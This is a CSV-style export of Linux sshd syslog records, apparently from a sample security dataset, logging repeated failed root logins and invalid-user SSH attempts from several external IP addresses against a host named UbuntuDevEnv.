+9669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:04,UbuntuDevEnv,2019-06-25 22:44:04,auth,UbuntuDevEnv,info,Disconnected from invalid user waski 139.199.113.140 port 55276 [preauth],48889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,waski,139.199.113.1,55276,,
+9670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:07,UbuntuDevEnv,2019-06-25 22:44:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:09,UbuntuDevEnv,2019-06-25 22:44:08,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 54518 ssh2,48911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54518,,
+9672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:13,UbuntuDevEnv,2019-06-25 22:44:11,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 54518 ssh2,48911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54518,,
+9673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:14,UbuntuDevEnv,2019-06-25 22:44:14,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 54518 ssh2,48911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54518,,
+9674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:22,UbuntuDevEnv,2019-06-25 22:44:21,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:22,UbuntuDevEnv,2019-06-25 22:44:21,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 54518: Too many authentication failures [preauth],48911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,54518,,
+9676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:22,UbuntuDevEnv,2019-06-25 22:44:21,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:22,UbuntuDevEnv,2019-06-25 22:44:21,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 54518 ssh2],48911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54518,,
+9678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:22,UbuntuDevEnv,2019-06-25 22:44:21,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 54518 ssh2 [preauth],48911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,54518,,
+9679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:26,UbuntuDevEnv,2019-06-25 22:44:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:28,UbuntuDevEnv,2019-06-25 22:44:27,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65266 ssh2,48983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65266,,
+9681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:28,UbuntuDevEnv,2019-06-25 22:44:28,auth,UbuntuDevEnv,info,Invalid user anton from 77.232.128.87 port 51819,49000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anton,77.232.128.8,51819,,
+9682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:28,UbuntuDevEnv,2019-06-25 22:44:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,49000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:28,UbuntuDevEnv,2019-06-25 22:44:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:31,UbuntuDevEnv,2019-06-25 22:44:30,auth,UbuntuDevEnv,info,Failed password for invalid user anton from 77.232.128.87 port 51819 ssh2,49000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anton,77.232.128.8,51819,,
+9685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:31,UbuntuDevEnv,2019-06-25 22:44:30,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 51819:11: Bye Bye [preauth],49000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,51819,,
+9686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:31,UbuntuDevEnv,2019-06-25 22:44:30,auth,UbuntuDevEnv,info,Disconnected from invalid user anton 77.232.128.87 port 51819 [preauth],49000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anton,77.232.128.8,51819,,
+9687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:31,UbuntuDevEnv,2019-06-25 22:44:31,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65266 ssh2,48983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65266,,
+9688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:31,UbuntuDevEnv,2019-06-25 22:44:31,auth,UbuntuDevEnv,info,Invalid user freebsd from 152.250.252.179 port 50706,49007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,freebsd,152.250.252.1,50706,,
+9689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:31,UbuntuDevEnv,2019-06-25 22:44:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,49007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:31,UbuntuDevEnv,2019-06-25 22:44:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:33,UbuntuDevEnv,2019-06-25 22:44:33,auth,UbuntuDevEnv,info,Failed password for invalid user freebsd from 152.250.252.179 port 50706 ssh2,49007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,freebsd,152.250.252.1,50706,,
+9692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:34,UbuntuDevEnv,2019-06-25 22:44:33,auth,UbuntuDevEnv,info,Disconnected from invalid user freebsd 152.250.252.179 port 50706 [preauth],49007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,freebsd,152.250.252.1,50706,,
+9693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:34,UbuntuDevEnv,2019-06-25 22:44:33,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 50706:11: Bye Bye [preauth],49007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,50706,,
+9694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:34,UbuntuDevEnv,2019-06-25 22:44:34,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65266 ssh2,48983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65266,,
+9695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:42,UbuntuDevEnv,2019-06-25 22:44:42,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,48983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:42,UbuntuDevEnv,2019-06-25 22:44:42,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,48983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:42,UbuntuDevEnv,2019-06-25 22:44:42,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 65266 ssh2],48983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65266,,
+9698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:42,UbuntuDevEnv,2019-06-25 22:44:42,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 65266 ssh2 [preauth],48983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65266,,
+9699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:42,UbuntuDevEnv,2019-06-25 22:44:42,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 65266: Too many authentication failures [preauth],48983,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,65266,,
+9700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:46,UbuntuDevEnv,2019-06-25 22:44:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:44:49,UbuntuDevEnv,2019-06-25 22:44:48,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 17981 ssh2,49058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,17981,,
+9702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:01,UbuntuDevEnv,2019-06-25 22:45:00,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.175 port 17981 ssh2],49058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,17981,,
+9703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:04,UbuntuDevEnv,2019-06-25 22:45:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 17981 ssh2 [preauth],49058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,17981,,
+9704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:04,UbuntuDevEnv,2019-06-25 22:45:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:04,UbuntuDevEnv,2019-06-25 22:45:03,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 17981 ssh2,49058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,17981,,
+9706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:04,UbuntuDevEnv,2019-06-25 22:45:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:04,UbuntuDevEnv,2019-06-25 22:45:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 17981: Too many authentication failures [preauth],49058,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,17981,,
+9708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:11,UbuntuDevEnv,2019-06-25 22:45:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:13,UbuntuDevEnv,2019-06-25 22:45:13,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34776 ssh2,49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34776,,
+9710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:14,UbuntuDevEnv,2019-06-25 22:45:13,auth,UbuntuDevEnv,info,Invalid user reiner from 178.62.54.79 port 59418,49201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reiner,178.62.54.7,59418,,
+9711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:14,UbuntuDevEnv,2019-06-25 22:45:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,49201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:14,UbuntuDevEnv,2019-06-25 22:45:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:16,UbuntuDevEnv,2019-06-25 22:45:15,auth,UbuntuDevEnv,info,Failed password for invalid user reiner from 178.62.54.79 port 59418 ssh2,49201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reiner,178.62.54.7,59418,,
+9714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:16,UbuntuDevEnv,2019-06-25 22:45:15,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 59418:11: Bye Bye [preauth],49201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,59418,,
+9715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:16,UbuntuDevEnv,2019-06-25 22:45:15,auth,UbuntuDevEnv,info,Disconnected from invalid user reiner 178.62.54.79 port 59418 [preauth],49201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reiner,178.62.54.7,59418,,
+9716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:16,UbuntuDevEnv,2019-06-25 22:45:16,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34776 ssh2,49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34776,,
+9717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:22,UbuntuDevEnv,2019-06-25 22:45:19,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34776 ssh2,49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34776,,
+9718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:23,UbuntuDevEnv,2019-06-25 22:45:22,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34776 ssh2,49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34776,,
+9719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:28,UbuntuDevEnv,2019-06-25 22:45:28,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:28,UbuntuDevEnv,2019-06-25 22:45:28,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 34776: Too many authentication failures [preauth],49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,34776,,
+9721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:28,UbuntuDevEnv,2019-06-25 22:45:28,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:28,UbuntuDevEnv,2019-06-25 22:45:28,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 34776 ssh2 [preauth],49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34776,,
+9723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:28,UbuntuDevEnv,2019-06-25 22:45:28,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 34776 ssh2],49172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34776,,
+9724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:29,UbuntuDevEnv,2019-06-25 22:45:29,auth,UbuntuDevEnv,info,Invalid user training from 139.199.113.140 port 41448,49304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,training,139.199.113.1,41448,,
+9725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:29,UbuntuDevEnv,2019-06-25 22:45:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,49304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:29,UbuntuDevEnv,2019-06-25 22:45:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,49304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:45:31,UbuntuDevEnv,2019-06-25 22:45:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,49315,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
